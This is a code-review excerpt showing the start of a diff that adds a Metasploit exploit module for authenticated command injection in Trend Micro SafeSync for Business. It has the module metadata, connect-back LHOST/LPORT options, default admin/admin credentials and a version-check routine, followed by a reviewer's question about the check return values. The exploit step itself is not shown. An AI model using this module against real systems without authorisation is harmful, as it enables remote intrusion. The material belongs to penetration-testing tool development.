modules/exploits/linux/http/trendmicro_safesync_exec.rb

```diff
@@ -0,0 +1,137 @@
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Trend Micro SafeSync for Business Exec Remote Code Injection",
+      'Description'    => %q{
+        This module exploits a vulnerability found in Trend Micro Safe Sync where an untrusted input is fed to ad_changed_sync.py, leading to command injection.
+        Please note: authentication is required to exploit this vulnerability.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Quentin Kaiser <kaiserquentin[at]gmail.com>'
+        ],
+      'References'     =>
+        [
+        ],
+      'Platform'        => 'linux',
+      'Targets'         => [ [ 'Linux', {} ] ],
+      'Payload'         => { 'BadChars' => "\x00" },
+      'CmdStagerFlavor' => [ 'bourne' ],
+      'Privileged'     => false,
+      'DefaultOptions' =>
+      {
+         'SSL' => true
+      },
+      'DisclosureDate' => "Sep 6 2016",
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The path to some web application', '/']),
+        OptBool.new('SSL', [ true, 'Use SSL', true ]),
+        OptAddress.new("LHOST", [true, "The local host for the exploits and handlers", Rex::Socket.source_address]),
+        OptPort.new('LPORT', [true, "The port SPS will connect back to ", 4444 ]),
+        OptString.new('ADMINACCOUNT', [true, 'Name of the SPS admin account', 'admin']),
+        OptString.new('ADMINPASS', [true, 'Password of the SPS admin account', 'admin']),
+      ], self.class)
+  end
+
+  def check
+    opts = login
+    if opts
+      uri = target_uri.path
+      res = send_request_cgi({
+        'method'   => 'GET',
+        'uri'      => normalize_uri(uri, "api", "system", "version"),
+        'headers'=>
+        {
+          'Cookie' => "mgmtui_session=#{opts['mgmtui_session']}",
+          'Referer' => "https://#{datastore['RHOST']}:#{datastore['RPORT']}/login.php",
+          'Origin' =>  "https://#{datastore['RHOST']}:#{datastore['RPORT']}",
+        }
+      })
+      if res and res.code == 200
+        j = res.get_json_document
+        version = j['version'].to_f
+        build = j['build'].to_s.split('.')
+        build_major = build[0].to_i(10)
+        build_minor = build[1].to_i(10)
+        build_version = build[2].to_i(10)
+        build_tag = build[3].to_i(10)
+        print_status("TrendMicro Safe Sync Server detected.")
+        print_status("Version: #{version}")
+        print_status("Build: #{j['build']}")
+
+        if (version <= 2.1 and build_major == 3 and build_minor == 2 and build_version == 0 and build_tag < 1426)
+            return Exploit::CheckCode::Vulnerable
+        else
+          return Exploit::CheckCode::Safe
+        end
+      end
+    end
+    Exploit::CheckCode::Safe
+  end
```

Comment:
I'm confused by the double Exploit::Checkcode::Safe.  Is there a reason for it?  Should the second one be unknown, maybe?  I feel like it should be unknown.